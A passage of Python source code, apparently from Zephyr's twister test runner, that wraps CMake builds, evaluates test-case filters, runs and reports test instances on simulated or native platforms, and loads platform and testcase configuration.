to the test cases inside. Useful when the whole instance is skipped
and the info is required also at the test cases level for reporting.
Should be used with caution, e.g. should not be used
to fill all results with passes
"""
status_to_verdict = {
'skipped': 'SKIP',
'error': 'BLOCK',
'failure': 'FAILED'
}
for k in self.results:
self.results[k] = status_to_verdict[self.status]
def __repr__(self):
return "<TestCase %s on %s>" % (self.testcase.name, self.platform.name)
class CMake():
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
def __init__(self, testcase, platform, source_dir, build_dir):
self.cwd = None
self.capture_output = True
self.defconfig = {}
self.cmake_cache = {}
self.instance = None
self.testcase = testcase
self.platform = platform
self.source_dir = source_dir
self.build_dir = build_dir
self.log = "build.log"
self.generator = None
self.generator_cmd = None
def parse_generated(self):
self.defconfig = {}
return {}
def run_build(self, args=[]):
logger.debug("Building %s for %s" % (self.source_dir, self.platform.name))
cmake_args = []
cmake_args.extend(args)
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
results = {}
if p.returncode == 0:
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
self.instance.status = "passed"
results = {'msg': msg, "returncode": p.returncode, "instance": self.instance}
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
else:
return None
else:
# A real error occurred, raise an exception
log_msg = ""
if out:
log_msg = out.decode(sys.getdefaultencoding())
with open(os.path.join(self.build_dir, self.log), "a") as log:
log.write(log_msg)
if log_msg:
res = re.findall("region `(FLASH|RAM|SRAM)' overflowed by", log_msg)
if res and not self.overflow_as_errors:
logger.debug("Test skipped due to {} Overflow".format(res[0]))
self.instance.status = "skipped"
self.instance.reason = "{} overflow".format(res[0])
else:
self.instance.status = "error"
self.instance.reason = "Build failure"
results = {
"returncode": p.returncode,
"instance": self.instance,
}
return results
def run_cmake(self, args=[]):
if self.warnings_as_errors:
ldflags = "-Wl,--fatal-warnings"
cflags = "-Werror"
aflags = "-Wa,--fatal-warnings"
gen_defines_args = "--err-on-deprecated-properties"
else:
ldflags = cflags = aflags = ""
gen_defines_args = ""
logger.debug("Running cmake on %s for %s" % (self.source_dir, self.platform.name))
cmake_args = [
f'-B{self.build_dir}',
f'-S{self.source_dir}',
f'-DEXTRA_CFLAGS="{cflags}"',
f'-DEXTRA_AFLAGS="{aflags}',
f'-DEXTRA_LDFLAGS="{ldflags}"',
f'-DEXTRA_GEN_DEFINES_ARGS={gen_defines_args}',
f'-G{self.generator}'
]
if self.cmake_only:
cmake_args.append("-DCMAKE_EXPORT_COMPILE_COMMANDS=1")
args = ["-D{}".format(a.replace('"', '')) for a in args]
cmake_args.extend(args)
cmake_opts = ['-DBOARD={}'.format(self.platform.name)]
cmake_args.extend(cmake_opts)
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
cmd = [cmake] + cmake_args
kwargs = dict()
if self.capture_output:
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
if self.cwd:
kwargs['cwd'] = self.cwd
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
if p.returncode == 0:
filter_results = self.parse_generated()
msg = "Finished building %s for %s" % (self.source_dir, self.platform.name)
logger.debug(msg)
results = {'msg': msg, 'filter': filter_results}
else:
self.instance.status = "error"
self.instance.reason = "Cmake build failure"
logger.error("Cmake build failure: %s for %s" % (self.source_dir, self.platform.name))
results = {"returncode": p.returncode}
if out:
with open(os.path.join(self.build_dir, self.log), "a") as log:
log_msg = out.decode(sys.getdefaultencoding())
log.write(log_msg)
return results
@staticmethod
def run_cmake_script(args=[]):
logger.debug("Running cmake script %s" % (args[0]))
cmake_args = ["-D{}".format(a.replace('"', '')) for a in args[1:]]
cmake_args.extend(['-P', args[0]])
logger.debug("Calling cmake with arguments: {}".format(cmake_args))
cmake = shutil.which('cmake')
if not cmake:
msg = "Unable to find `cmake` in path"
logger.error(msg)
raise Exception(msg)
cmd = [cmake] + cmake_args
kwargs = dict()
kwargs['stdout'] = subprocess.PIPE
# CMake sends the output of message() to stderr unless it's STATUS
kwargs['stderr'] = subprocess.STDOUT
p = subprocess.Popen(cmd, **kwargs)
out, _ = p.communicate()
if p.returncode == 0:
msg = "Finished running %s" % (args[0])
logger.debug(msg)
results = {"returncode": p.returncode, "msg": msg, "stdout": out}
else:
logger.error("Cmake script failure: %s" % (args[0]))
results = {"returncode": p.returncode}
return results
class FilterBuilder(CMake):
def __init__(self, testcase, platform, source_dir, build_dir):
super().__init__(testcase, platform, source_dir, build_dir)
self.log = "config-twister.log"
def parse_generated(self):
if self.platform.name == "unit_testing":
return {}
cmake_cache_path = os.path.join(self.build_dir, "CMakeCache.txt")
defconfig_path = os.path.join(self.build_dir, "zephyr", ".config")
with open(defconfig_path, "r") as fp:
defconfig = {}
for line in fp.readlines():
m = self.config_re.match(line)
if not m:
if line.strip() and not line.startswith("#"):
sys.stderr.write("Unrecognized line %s\n" % line)
continue
defconfig[m.group(1)] = m.group(2).strip()
self.defconfig = defconfig
cmake_conf = {}
try:
cache = CMakeCache.from_file(cmake_cache_path)
except FileNotFoundError:
cache = {}
for k in iter(cache):
cmake_conf[k.name] = k.value
self.cmake_cache = cmake_conf
filter_data = {
"ARCH": self.platform.arch,
"PLATFORM": self.platform.name
}
filter_data.update(os.environ)
filter_data.update(self.defconfig)
filter_data.update(self.cmake_cache)
edt_pickle = os.path.join(self.build_dir, "zephyr", "edt.pickle")
if self.testcase and self.testcase.tc_filter:
try:
if os.path.exists(edt_pickle):
with open(edt_pickle, 'rb') as f:
edt = pickle.load(f)
else:
edt = None
res = expr_parser.parse(self.testcase.tc_filter, filter_data, edt)
except (ValueError, SyntaxError) as se:
sys.stderr.write(
"Failed processing %s\n" % self.testcase.yamlfile)
raise se
if not res:
return {os.path.join(self.platform.name, self.testcase.name): True}
else:
return {os.path.join(self.platform.name, self.testcase.name): False}
else:
self.platform.filter_data = filter_data
return filter_data
class ProjectBuilder(FilterBuilder):
def __init__(self, suite, instance, **kwargs):
super().__init__(instance.testcase, instance.platform, instance.testcase.source_dir, instance.build_dir)
self.log = "build.log"
self.instance = instance
self.suite = suite
self.filtered_tests = 0
self.lsan = kwargs.get('lsan', False)
self.asan = kwargs.get('asan', False)
self.ubsan = kwargs.get('ubsan', False)
self.valgrind = kwargs.get('valgrind', False)
self.extra_args = kwargs.get('extra_args', [])
self.device_testing = kwargs.get('device_testing', False)
self.cmake_only = kwargs.get('cmake_only', False)
self.cleanup = kwargs.get('cleanup', False)
self.coverage = kwargs.get('coverage', False)
self.inline_logs = kwargs.get('inline_logs', False)
self.generator = kwargs.get('generator', None)
self.generator_cmd = kwargs.get('generator_cmd', None)
self.verbose = kwargs.get('verbose', None)
self.warnings_as_errors = kwargs.get('warnings_as_errors', True)
self.overflow_as_errors = kwargs.get('overflow_as_errors', False)
@staticmethod
def log_info(filename, inline_logs):
filename = os.path.abspath(os.path.realpath(filename))
if inline_logs:
logger.info("{:-^100}".format(filename))
try:
with open(filename) as fp:
data = fp.read()
except Exception as e:
data = "Unable to read log data (%s)\n" % (str(e))
logger.error(data)
logger.info("{:-^100}".format(filename))
else:
logger.error("see: " + Fore.YELLOW + filename + Fore.RESET)
def log_info_file(self, inline_logs):
build_dir = self.instance.build_dir
h_log = "{}/handler.log".format(build_dir)
b_log = "{}/build.log".format(build_dir)
v_log = "{}/valgrind.log".format(build_dir)
d_log = "{}/device.log".format(build_dir)
if os.path.exists(v_log) and "Valgrind" in self.instance.reason:
self.log_info("{}".format(v_log), inline_logs)
elif os.path.exists(h_log) and os.path.getsize(h_log) > 0:
self.log_info("{}".format(h_log), inline_logs)
elif os.path.exists(d_log) and os.path.getsize(d_log) > 0:
self.log_info("{}".format(d_log), inline_logs)
else:
self.log_info("{}".format(b_log), inline_logs)
def setup_handler(self):
instance = self.instance
args = []
# FIXME: Needs simplification
if instance.platform.simulation == "qemu":
instance.handler = QEMUHandler(instance, "qemu")
args.append("QEMU_PIPE=%s" % instance.handler.get_fifo())
instance.handler.call_make_run = True
elif instance.testcase.type == "unit":
instance.handler = BinaryHandler(instance, "unit")
instance.handler.binary = os.path.join(instance.build_dir, "testbinary")
if self.coverage:
args.append("COVERAGE=1")
elif instance.platform.type == "native":
handler = BinaryHandler(instance, "native")
handler.asan = self.asan
handler.valgrind = self.valgrind
handler.lsan = self.lsan
handler.ubsan = self.ubsan
handler.coverage = self.coverage
handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe")
instance.handler = handler
elif instance.platform.simulation == "renode":
if find_executable("renode"):
instance.handler = BinaryHandler(instance, "renode")
instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid")
instance.handler.call_make_run = True
elif instance.platform.simulation == "tsim":
instance.handler = BinaryHandler(instance, "tsim")
instance.handler.call_make_run = True
elif self.device_testing:
instance.handler = DeviceHandler(instance, "device")
instance.handler.coverage = self.coverage
elif instance.platform.simulation == "nsim":
if find_executable("nsimdrv"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "mdb-nsim":
if find_executable("mdb"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.pid_fn = os.path.join(instance.build_dir, "mdb.pid")
instance.handler.call_west_flash = True
elif instance.platform.simulation == "armfvp":
instance.handler = BinaryHandler(instance, "armfvp")
instance.handler.call_make_run = True
if instance.handler:
instance.handler.args = args
instance.handler.generator_cmd = self.generator_cmd
instance.handler.generator = self.generator
def process(self, pipeline, done, message, lock, results):
op = message.get('op')
if not self.instance.handler:
self.setup_handler()
# The build process, call cmake and build with configured generator
if op == "cmake":
res = self.cmake()
if self.instance.status in ["failed", "error"]:
pipeline.put({"op": "report", "test": self.instance})
elif self.cmake_only:
if self.instance.status is None:
self.instance.status = "passed"
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.name in res['filter'] and res['filter'][self.instance.name]:
logger.debug("filtering %s" % self.instance.name)
self.instance.status = "skipped"
self.instance.reason = "filter"
results.skipped_runtime += 1
for case in self.instance.testcase.cases:
self.instance.results.update({case: 'SKIP'})
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "build", "test": self.instance})
elif op == "build":
logger.debug("build test: %s" % self.instance.name)
res = self.build()
if not res:
self.instance.status = "error"
self.instance.reason = "Build Failure"
pipeline.put({"op": "report", "test": self.instance})
else:
# Count skipped cases during build, for example
# due to ram/rom overflow.
inst = res.get("instance", None)
if inst and inst.status == "skipped":
results.skipped_runtime += 1
if res.get('returncode', 1) > 0:
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.run and self.instance.handler:
pipeline.put({"op": "run", "test": self.instance})
else:
pipeline.put({"op": "report", "test": self.instance})
# Run the generated binary using one of the supported handlers
elif op == "run":
logger.debug("run test: %s" % self.instance.name)
self.run()
self.instance.status, _ = self.instance.handler.get_state()
logger.debug(f"run status: {self.instance.name} {self.instance.status}")
# to make it work with pickle
self.instance.handler.thread = None
self.instance.handler.suite = None
pipeline.put({
"op": "report",
"test": self.instance,
"status": self.instance.status,
"reason": self.instance.reason
}
)
# Report results and output progress to screen
elif op == "report":
with lock:
done.put(self.instance)
self.report_out(results)
if self.cleanup and not self.coverage and self.instance.status == "passed":
pipeline.put({
"op": "cleanup",
"test": self.instance
})
elif op == "cleanup":
if self.device_testing:
self.cleanup_device_testing_artifacts()
else:
self.cleanup_artifacts()
def cleanup_artifacts(self, additional_keep=[]):
logger.debug("Cleaning up {}".format(self.instance.build_dir))
allow = [
'zephyr/.config',
'handler.log',
'build.log',
'device.log',
'recording.csv',
]
allow += additional_keep
allow = [os.path.join(self.instance.build_dir, file) for file in allow]
for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False):
for name in filenames:
path = os.path.join(dirpath, name)
if path not in allow:
os.remove(path)
# Remove empty directories and symbolic links to directories
for dir in dirnames:
path = os.path.join(dirpath, dir)
if os.path.islink(path):
os.remove(path)
elif not os.listdir(path):
os.rmdir(path)
def cleanup_device_testing_artifacts(self):
logger.debug("Cleaning up for Device Testing {}".format(self.instance.build_dir))
sanitizelist = [
'CMakeCache.txt',
'zephyr/runners.yaml',
]
keep = [
'zephyr/zephyr.hex',
'zephyr/zephyr.bin',
'zephyr/zephyr.elf',
]
keep += sanitizelist
self.cleanup_artifacts(keep)
# sanitize paths so files are relocatable
for file in sanitizelist:
file = os.path.join(self.instance.build_dir, file)
with open(file, "rt") as fin:
data = fin.read()
data = data.replace(canonical_zephyr_base+"/", "")
with open(file, "wt") as fin:
fin.write(data)
def report_out(self, results):
total_to_do = results.total - results.skipped_configs
total_tests_width = len(str(total_to_do))
results.done += 1
instance = self.instance
if instance.status in ["error", "failed", "timeout", "flash_error"]:
if instance.status == "error":
results.error += 1
results.failed += 1
if self.verbose:
status = Fore.RED + "FAILED " + Fore.RESET + instance.reason
else:
print("")
logger.error(
"{:<25} {:<50} {}FAILED{}: {}".format(
instance.platform.name,
instance.testcase.name,
Fore.RED,
Fore.RESET,
instance.reason))
if not self.verbose:
self.log_info_file(self.inline_logs)
elif instance.status == "skipped":
status = Fore.YELLOW + "SKIPPED" + Fore.RESET
elif instance.status == "passed":
status = Fore.GREEN + "PASSED" + Fore.RESET
else:
logger.debug(f"Unknown status = {instance.status}")
status = Fore.YELLOW + "UNKNOWN" + Fore.RESET
if self.verbose:
if self.cmake_only:
more_info = "cmake"
elif instance.status == "skipped":
more_info = instance.reason
else:
if instance.handler and instance.run:
more_info = instance.handler.type_str
htime = instance.handler.duration
if htime:
more_info += " {:.3f}s".format(htime)
else:
more_info = "build"
logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format(
results.done, total_tests_width, total_to_do, instance.platform.name,
instance.testcase.name, status, more_info))
if instance.status in ["error", "failed", "timeout"]:
self.log_info_file(self.inline_logs)
else:
completed_perc = 0
if total_to_do > 0:
completed_perc = int((float(results.done) / total_to_do) * 100)
skipped = results.skipped_configs + results.skipped_runtime
sys.stdout.write("\rINFO - Total complete: %s%4d/%4d%s %2d%% skipped: %s%4d%s, failed: %s%4d%s" % (
Fore.GREEN,
results.done,
total_to_do,
Fore.RESET,
completed_perc,
Fore.YELLOW if skipped > 0 else Fore.RESET,
skipped,
Fore.RESET,
Fore.RED if results.failed > 0 else Fore.RESET,
results.failed,
Fore.RESET
)
)
sys.stdout.flush()
def cmake(self):
instance = self.instance
args = self.testcase.extra_args[:]
args += self.extra_args
if instance.handler:
args += instance.handler.args
# merge overlay files into one variable
def extract_overlays(args):
re_overlay = re.compile('OVERLAY_CONFIG=(.*)')
other_args = []
overlays = []
for arg in args:
match = re_overlay.search(arg)
if match:
overlays.append(match.group(1).strip('\'"'))
else:
other_args.append(arg)
args[:] = other_args
return overlays
overlays = extract_overlays(args)
if os.path.exists(os.path.join(instance.build_dir,
"twister", "testcase_extra.conf")):
overlays.append(os.path.join(instance.build_dir,
"twister", "testcase_extra.conf"))
if overlays:
args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays)))
res = self.run_cmake(args)
return res
def build(self):
res = self.run_build(['--build', self.build_dir])
return res
def run(self):
instance = self.instance
if instance.handler:
if instance.handler.type_str == "device":
instance.handler.suite = self.suite
instance.handler.handle()
sys.stdout.flush()
class TestSuite(DisablePyTestCollectionMixin):
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
tc_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "testcase-schema.yaml"))
quarantine_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "quarantine-schema.yaml"))
testcase_valid_keys = {"tags": {"type": "set", "required": False},
"type": {"type": "str", "default": "integration"},
"extra_args": {"type": "list"},
"extra_configs": {"type": "list"},
"build_only": {"type": "bool", "default": False},
"build_on_all": {"type": "bool", "default": False},
"skip": {"type": "bool", "default": False},
"slow": {"type": "bool", "default": False},
"timeout": {"type": "int", "default": 60},
"min_ram": {"type": "int", "default": 8},
"depends_on": {"type": "set"},
"min_flash": {"type": "int", "default": 32},
"arch_allow": {"type": "set"},
"arch_exclude": {"type": "set"},
"extra_sections": {"type": "list", "default": []},
"integration_platforms": {"type": "list", "default": []},
"platform_exclude": {"type": "set"},
"platform_allow": {"type": "set"},
"toolchain_exclude": {"type": "set"},
"toolchain_allow": {"type": "set"},
"filter": {"type": "str"},
"harness": {"type": "str"},
"harness_config": {"type": "map", "default": {}}
}
RELEASE_DATA = os.path.join(ZEPHYR_BASE, "scripts", "release",
"twister_last_release.csv")
SAMPLE_FILENAME = 'sample.yaml'
TESTCASE_FILENAME = 'testcase.yaml'
def __init__(self, board_root_list=[], testcase_roots=[], outdir=None):
self.roots = testcase_roots
if not isinstance(board_root_list, list):
self.board_roots = [board_root_list]
else:
self.board_roots = board_root_list
# Testsuite Options
self.coverage_platform = []
self.build_only = False
self.cmake_only = False
self.cleanup = False
self.enable_slow = False
self.device_testing = False
self.fixtures = []
self.enable_coverage = False
self.enable_ubsan = False
self.enable_lsan = False
self.enable_asan = False
self.enable_valgrind = False
self.extra_args = []
self.inline_logs = False
self.enable_sizes_report = False
self.west_flash = None
self.west_runner = None
self.generator = None
self.generator_cmd = None
self.warnings_as_errors = True
self.overflow_as_errors = False
self.quarantine_verify = False
# Keep track of which test cases we've filtered out and why
self.testcases = {}
self.quarantine = {}
self.platforms = []
self.selected_platforms = []
self.filtered_platforms = []
self.default_platforms = []
self.outdir = os.path.abspath(outdir)
self.discards = {}
self.load_errors = 0
self.instances = dict()
self.total_platforms = 0
self.start_time = 0
self.duration = 0
self.warnings = 0
# hardcoded for now
self.duts = []
# run integration tests only
self.integration = False
self.pipeline = None
self.version = "NA"
def check_zephyr_version(self):
try:
subproc = subprocess.run(["git", "describe", "--abbrev=12"],
stdout=subprocess.PIPE,
universal_newlines=True,
cwd=ZEPHYR_BASE)
if subproc.returncode == 0:
self.version = subproc.stdout.strip()
logger.info(f"Zephyr version: {self.version}")
except OSError:
logger.info("Cannot read zephyr version.")
def get_platform_instances(self, platform):
filtered_dict = {k:v for k,v in self.instances.items() if k.startswith(platform + "/")}
return filtered_dict
def config(self):
logger.info("coverage platform: {}".format(self.coverage_platform))
# Debug Functions
@staticmethod
def info(what):
sys.stdout.write(what + "\n")
sys.stdout.flush()
def update_counting(self, results=None, initial=False):
results.skipped_configs = 0
results.skipped_cases = 0
for instance in self.instances.values():
if initial:
results.cases += len(instance.testcase.cases)
if instance.status == 'skipped':
results.skipped_configs += 1
results.skipped_cases += len(instance.testcase.cases)
elif instance.status == "passed":
results.passed += 1
for res in instance.results.values():
if res == 'SKIP':
results.skipped_cases += 1
def compare_metrics(self, filename):
# name, datatype, lower results better
interesting_metrics = [("ram_size", int, True),
("rom_size", int, True)]
if not os.path.exists(filename):
logger.error("Cannot compare metrics, %s not found" % filename)
return []
results = []
saved_metrics = {}
with open(filename) as fp:
cr = csv.DictReader(fp)
for row in cr:
d = {}
for m, _, _ in interesting_metrics:
d[m] = row[m]
saved_metrics[(row["test"], row["platform"])] = d
for instance in self.instances.values():
mkey = (instance.testcase.name, instance.platform.name)
if mkey not in saved_metrics:
continue
sm = saved_metrics[mkey]
for metric, mtype, lower_better in interesting_metrics:
if metric not in instance.metrics:
continue
if sm[metric] == "":
continue
delta = instance.metrics.get(metric, 0) - mtype(sm[metric])
if delta == 0:
continue
results.append((instance, metric, instance.metrics.get(metric, 0), delta,
lower_better))
return results
def footprint_reports(self, report, show_footprint, all_deltas,
footprint_threshold, last_metrics):
if not report:
return
logger.debug("running footprint_reports")
deltas = self.compare_metrics(report)
warnings = 0
if deltas and show_footprint:
for i, metric, value, delta, lower_better in deltas:
if not all_deltas and ((delta < 0 and lower_better) or
(delta > 0 and not lower_better)):
continue
percentage = 0
if value > delta:
percentage = (float(delta) / float(value - delta))
if not all_deltas and (percentage < (footprint_threshold / 100.0)):
continue
logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format(
i.platform.name, i.testcase.name, Fore.YELLOW,
"INFO" if all_deltas else "WARNING", Fore.RESET,
metric, delta, value, percentage))
warnings += 1
if warnings:
logger.warning("Deltas based on metrics from last %s" %
("release" if not last_metrics else "run"))
def summary(self, results, unrecognized_sections):
failed = 0
run = 0
for instance in self.instances.values():
if instance.status == "failed":
failed += 1
elif instance.metrics.get("unrecognized") and not unrecognized_sections:
logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" %
(Fore.RED, Fore.RESET, instance.name,
str(instance.metrics.get("unrecognized", []))))
failed += 1
if instance.metrics.get('handler_time', None):
run += 1
if results.total and results.total != results.skipped_configs:
pass_rate = (float(results.passed) / float(results.total - results.skipped_configs))
else:
pass_rate = 0
logger.info(
"{}{} of {}{} test configurations passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format(
Fore.RED if failed else Fore.GREEN,
results.passed,
results.total - results.skipped_configs,
Fore.RESET,
pass_rate,
Fore.RED if results.failed else Fore.RESET,
results.failed,
Fore.RESET,
results.skipped_configs,
Fore.YELLOW if self.warnings else Fore.RESET,
self.warnings,
Fore.RESET,
self.duration))
self.total_platforms = len(self.platforms)
# if we are only building, do not report about tests being executed.
if self.platforms and not self.build_only:
logger.info("In total {} test cases were executed, {} skipped on {} out of total {} platforms ({:02.2f}%)".format(
results.cases - results.skipped_cases,
results.skipped_cases,
len(self.filtered_platforms),
self.total_platforms,
(100 * len(self.filtered_platforms) / len(self.platforms))
))
logger.info(f"{Fore.GREEN}{run}{Fore.RESET} test configurations executed on platforms, \
{Fore.RED}{results.total - run - results.skipped_configs}{Fore.RESET} test configurations were only built.")
def save_reports(self, name, suffix, report_dir, no_update, release, only_failed, platform_reports, json_report):
if not self.instances:
return
logger.info("Saving reports...")
if name:
report_name = name
else:
report_name = "twister"
if report_dir:
os.makedirs(report_dir, exist_ok=True)
filename = os.path.join(report_dir, report_name)
outdir = report_dir
else:
filename = os.path.join(self.outdir, report_name)
outdir = self.outdir
if suffix:
filename = "{}_{}".format(filename, suffix)
if not no_update:
self.xunit_report(filename + ".xml", full_report=False,
append=only_failed, version=self.version)
self.xunit_report(filename + "_report.xml", full_report=True,
append=only_failed, version=self.version)
self.csv_report(filename + ".csv")
if json_report:
self.json_report(filename + ".json", append=only_failed, version=self.version)
if platform_reports:
self.target_report(outdir, suffix, append=only_failed)
if self.discards:
self.discard_report(filename + "_discard.csv")
if release:
self.csv_report(self.RELEASE_DATA)
def add_configurations(self):
for board_root in self.board_roots:
board_root = os.path.abspath(board_root)
logger.debug("Reading platform configuration files under %s..." %
board_root)
for file in glob.glob(os.path.join(board_root, "*", "*", "*.yaml")):
try:
platform = Platform()
platform.load(file)
if platform.name in [p.name for p in self.platforms]:
logger.error(f"Duplicate platform {platform.name} in {file}")
raise Exception(f"Duplicate platform identifier {platform.name} found")
if platform.twister:
self.platforms.append(platform)
if platform.default:
self.default_platforms.append(platform.name)
except RuntimeError as e:
logger.error("E: %s: can't load: %s" % (file, e))
self.load_errors += 1
def get_all_tests(self):
tests = []
for _, tc in self.testcases.items():
for case in tc.cases:
tests.append(case)
return tests
@staticmethod
def get_toolchain():
toolchain_script = Path(ZEPHYR_BASE) / Path('cmake/verify-toolchain.cmake')
result = CMake.run_cmake_script([toolchain_script, "FORMAT=json"])
try:
if result['returncode']:
raise TwisterRuntimeError("E: Variable ZEPHYR_TOOLCHAIN_VARIANT is not defined")
except Exception as e:
print(str(e))
sys.exit(2)
toolchain = json.loads(result['stdout'])['ZEPHYR_TOOLCHAIN_VARIANT']
logger.info(f"Using '{toolchain}' toolchain.")
return toolchain
def add_testcases(self, testcase_filter=[]):
for root in self.roots:
root = os.path.abspath(root)
logger.debug("Reading test case configuration files under %s..." % root)
for dirpath, _, filenames in os.walk(root, topdown=True):
if self.SAMPLE_FILENAME in filenames:
filename = self.SAMPLE_FILENAME
elif self.TESTCASE_FILENAME in filenames:
filename = self.TESTCASE_FILENAME
else:
continue
logger.debug("Found possible test case in " + dirpath)
tc_path = os.path.join(dirpath, filename)
try:
parsed_data = TwisterConfigParser(tc_path, self.tc_schema)
parsed_data.load()
tc_path = os.path.dirname(tc_path)
workdir = os.path.relpath(tc_path, root)
for name in parsed_data.tests.keys():
tc = TestCase(root, workdir, name)
tc_dict = parsed_data.get_test(name, self.testcase_valid_keys)
tc.source_dir = tc_path
tc.yamlfile = tc_path
tc.type = tc_dict["type"]
tc.tags = tc_dict["tags"]
tc.extra_args = tc_dict["extra_args"]
tc.extra_configs = tc_dict["extra_configs"]
tc.arch_allow = tc_dict["arch_allow"]
tc.arch_exclude = tc_dict["arch_exclude"]
tc.skip = tc_dict["skip"]
tc.platform_exclude = tc_dict["platform_exclude"]
tc.platform_allow = tc_dict["platform_allow"]
tc.toolchain_exclude = tc_dict["toolchain_exclude"]
tc.toolchain_allow = tc_dict["toolchain_allow"]
tc.tc_filter = tc_dict["filter"]
tc.timeout = tc_dict["timeout"]
tc.harness = tc_dict["harness"]
tc.harness_config = tc_dict["harness_config"]
if tc.harness == 'console' and not tc.harness_config:
raise Exception('Harness config error: console harness defined without a configuration.')
tc.build_only = tc_dict["build_only"]
tc.build_on_all = tc_dict["build_on_all"]
tc.slow = tc_dict["slow"]
tc.min_ram = tc_dict["min_ram"]
tc.depends_on = tc_dict["depends_on"]
tc.min_flash = tc_dict["min_flash"]
tc.extra_sections = tc_dict["extra_sections"]
tc.integration_platforms = tc_dict["integration_platforms"]
tc.parse_subcases(tc_path)
if testcase_filter:
if tc.name and tc.name in testcase_filter:
self.testcases[tc.name] = tc
else:
self.testcases[tc.name] = tc
except Exception as e:
logger.error("%s: can't load (skipping): %s" % (tc_path, e))
self.load_errors += 1
return len(self.testcases)
def get_platform(self, name):
selected_platform = None
for platform in self.platforms:
if platform.name == name:
selected_platform = platform
break
return selected_platform
def load_quarantine(self, file):
"""
Loads quarantine list from the given yaml file. Creates a dictionary
of all tests configurations (platform + scenario: comment) that shall be
skipped due to quarantine
"""
# Load yaml into quarantine_yaml
quarantine_yaml = scl.yaml_load_verify(file, self.quarantine_schema)
# Create quarantine_list with a product of the listed
# platforms and scenarios for each entry in quarantine yaml
quarantine_list = []
for quar_dict in quarantine_yaml:
if quar_dict['platforms'][0] == "all":
plat = [p.name for p in self.platforms]
else:
plat = quar_dict['platforms']
comment = quar_dict.get('comment', "NA")
quarantine_list.append([{".".join([p, s]): comment}
for p in plat for s in quar_dict['scenarios']])
# Flatten the quarantine_list
quarantine_list = [it for sublist in quarantine_list for it in sublist]
# Change quarantine_list into a dictionary
for d in quarantine_list:
self.quarantine.update(d)
def load_from_file(self, file, filter_status=[], filter_platform=[]):
try:
with open(file, "r") as fp:
cr = csv.DictReader(fp)
instance_list = []
for row in cr:
if row["status"] in filter_status:
continue
test = row["test"]
platform = self.get_platform(row["platform"])
if filter_platform and platform.name not in filter_platform:
continue
instance = TestInstance(self.testcases[test], platform, self.outdir)
if self.device_testing:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
instance.create_overlay(platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
instance_list.append(instance)
self.add_instances(instance_list)
except KeyError as e:
logger.error("Key error while parsing tests file.({})".format(str(e)))
sys.exit(2)
except FileNotFoundError as e:
logger.error("Couldn't find input file with list of tests. ({})".format(e))
sys.exit(2)
def apply_filters(self, **kwargs):
toolchain = self.get_toolchain()
discards = {}
platform_filter = kwargs.get('platform')
exclude_platform = kwargs.get('exclude_platform', [])
testcase_filter = kwargs.get('run_individual_tests', [])
arch_filter = kwargs.get('arch')
tag_filter = kwargs.get('tag')
exclude_tag = kwargs.get('exclude_tag')
all_filter = kwargs.get('all')
runnable = kwargs.get('runnable')
force_toolchain = kwargs.get('force_toolchain')
force_platform = kwargs.get('force_platform')
emu_filter = kwargs.get('emulation_only')
logger.debug("platform filter: " + str(platform_filter))
logger.debug(" arch_filter: " + str(arch_filter))
logger.debug(" tag_filter: " + str(tag_filter))
logger.debug(" exclude_tag: " + str(exclude_tag))
default_platforms = False
emulation_platforms = False
if all_filter:
logger.info("Selecting all possible platforms per test case")
# When --all used, any --platform arguments ignored
platform_filter = []
elif not platform_filter and not emu_filter:
logger.info("Selecting default platforms per test case")
default_platforms = True
elif emu_filter:
logger.info("Selecting emulation platforms per test case")
emulation_platforms = True
if platform_filter:
platforms = list(filter(lambda p: p.name in platform_filter, self.platforms))
elif emu_filter:
platforms = list(filter(lambda p: p.simulation != 'na', self.platforms))
elif arch_filter:
platforms = list(filter(lambda p: p.arch in arch_filter, self.platforms))
elif default_platforms:
platforms = list(filter(lambda p: p.default, self.platforms))
else:
platforms = self.platforms
logger.info("Building initial testcase list...")
for tc_name, tc in self.testcases.items():
if tc.build_on_all and not platform_filter:
platform_scope = self.platforms
elif tc.integration_platforms and self.integration:
platform_scope = list(filter(lambda item: item.name in tc.integration_platforms, \
self.platforms))
else:
platform_scope = platforms
integration = self.integration and tc.integration_platforms
# If there isn't any overlap between the platform_allow list and the platform_scope
# we set the scope to the platform_allow list
if tc.platform_allow and not platform_filter and not integration:
